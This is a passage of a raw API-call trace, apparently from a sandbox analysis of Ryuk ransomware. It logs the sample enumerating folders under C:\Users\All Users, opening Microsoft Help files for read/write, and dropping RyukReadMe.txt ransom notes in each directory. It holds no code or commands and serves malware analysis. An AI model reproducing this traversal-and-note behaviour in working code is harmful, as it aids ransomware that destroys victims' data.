dwFileAttributes=0x80) returned 0 [0159.649] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.649] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.649] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.650] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.650] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.650] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.650] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.650] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.650] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.650] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.650] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.650] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.650] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.651] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.651] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.651] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.651] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.651] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.651] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.651] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.651] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.651] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.651] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.652] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.652] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.652] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.652] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.652] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.652] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.652] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.652] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.652] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.652] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.653] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.653] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.653] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.653] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.653] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.653] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.653] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.653] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.653] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.654] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.654] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.654] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.654] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.654] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.654] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.655] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.655] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.655] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.655] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.655] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.655] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.655] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.656] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.656] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.656] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.656] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.656] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.656] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.656] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.657] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.657] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.657] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.657] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.657] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.657] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.657] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.657] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.658] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.658] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.658] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.658] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.658] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.658] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.658] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.658] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.659] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.659] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.659] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.659] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.659] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.659] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.660] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.660] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.660] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.660] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.660] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.661] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.661] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.661] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.661] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.661] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.662] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.662] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.662] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.662] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.662] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl", dwFileAttributes=0x80) returned 0 [0159.663] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.663] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.663] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.663] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.664] SetLastError (dwErrCode=0x0) [0159.664] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft help\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.667] GetLastError () returned 0x5 [0159.667] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.667] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.667] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.667] SetLastError (dwErrCode=0x0) [0159.667] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.668] GetLastError () returned 0xb7 [0159.668] CloseHandle (hObject=0x184) returned 1 [0159.668] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.668] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.668] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.668] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.668] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.668] SetLastError (dwErrCode=0x0) [0159.668] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\oracle\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.668] GetLastError () returned 0xb7 [0159.668] CloseHandle (hObject=0x184) returned 1 [0159.668] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.668] SetLastError (dwErrCode=0x0) [0159.668] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.669] GetLastError () returned 0xb7 [0159.669] CloseHandle (hObject=0x184) returned 1 [0159.669] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.669] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.669] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.670] SetLastError (dwErrCode=0x0) [0159.670] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.670] GetLastError () returned 0x5 [0159.670] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.670] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.670] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.670] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.670] SetLastError (dwErrCode=0x0) [0159.670] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.670] GetLastError () returned 0x5 [0159.670] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.670] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.670] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.671] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.671] SetLastError (dwErrCode=0x0) [0159.671] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.671] GetLastError () returned 0x5 [0159.671] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.671] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.671] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.671] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.671] SetLastError (dwErrCode=0x0) [0159.671] CreateFileW (lpFileName="C:\\Users\\All Users\\Package 